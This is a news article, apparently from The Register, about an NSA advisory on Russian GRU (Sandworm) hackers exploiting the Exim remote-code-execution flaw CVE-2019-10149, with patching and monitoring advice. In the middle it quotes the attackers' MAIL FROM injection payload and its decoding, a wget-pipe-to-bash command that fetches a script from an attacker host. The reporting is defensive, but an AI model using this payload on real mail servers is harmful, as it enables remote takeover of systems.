Oh no, you're thinking, yet another cookie pop-up. Well, sorry, it's the law. We measure how many people read us, and ensure you see relevant ads, by storing cookies on your device. If you're cool with that, hit “Accept all Cookies”. For more info and to customize your settings, hit “Customize Settings”.

Review and manage your consent

Here's an overview of our use of cookies, similar technologies and how to manage them. You can also change your choices at any time, by hitting the “Your Consent Options” link on the site's footer.

Manage Cookie Preferences
  • These cookies are strictly necessary so that you can navigate the site as normal and use all features. Without these cookies we cannot provide you with the service that you expect.

  • These cookies are used to make advertising messages more relevant to you. They perform functions like preventing the same ad from continuously reappearing, ensuring that ads are properly displayed for advertisers, and in some cases selecting advertisements that are based on your interests.

  • These cookies collect information in aggregate form to help us understand how our websites are being used. They allow us to count visits and traffic sources so that we can measure and improve the performance of our sites. If people say no to these cookies, we do not know how many people have visited and we cannot monitor performance.

See also our Cookie policy and Privacy policy.

This article is more than 1 year old

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously

GRU crew actively exploit hole – but you patched it months ago, right?

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:

MAIL FROM:<${run{\x2Fbin\x2Fsh\t-
c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be>

That hexadecimal decodes to:
/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

hacker

American intelligence follows British lead in warning of serious VPN vulnerabilities

READ MORE

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

The Sandworm hacking group has also previously been linked to attacks on a research lab in Britain, and the nation's Foreign Office.

The exploit of CVE-2019-10149 by the Sandworm crew has been on-going since August, the NSA said. Fortunately, there has also been a fix out for this bug for nearly a year – the flaw was introduced in Exim 4.87 and patched back in June of 2019.

Updating Exim to version 4.93 or later will close off the vulnerability. While admins can download the update, using your Linux distro's package manager will be the easiest way to get the fix, if for some reason you don't already have it.

Admins are also advised to keep a close eye on their servers to check for suspicious activity, such as new accounts being added or security settings being changed.

"Routinely verifying no unauthorized system modifications, such as additional accounts and SSH keys, have occurred can help detect a compromise," noted the NSA. "To detect these modifications, administrators can use file integrity monitoring software that alerts an administrator or blocks unauthorized changes on the system.

"If an MTA DMZ was configured in a least access model, for example to deny by default MTA initiated outbound traffic destined for port 80/443 on the internet while only permitting traffic initiated from an MTA to necessary hosts on port 80/443, the actors’ method of using CVE-2019-10149 would have been mitigated." ®

 

Similar topics

TIP US OFF

Send us news


Other stories you might like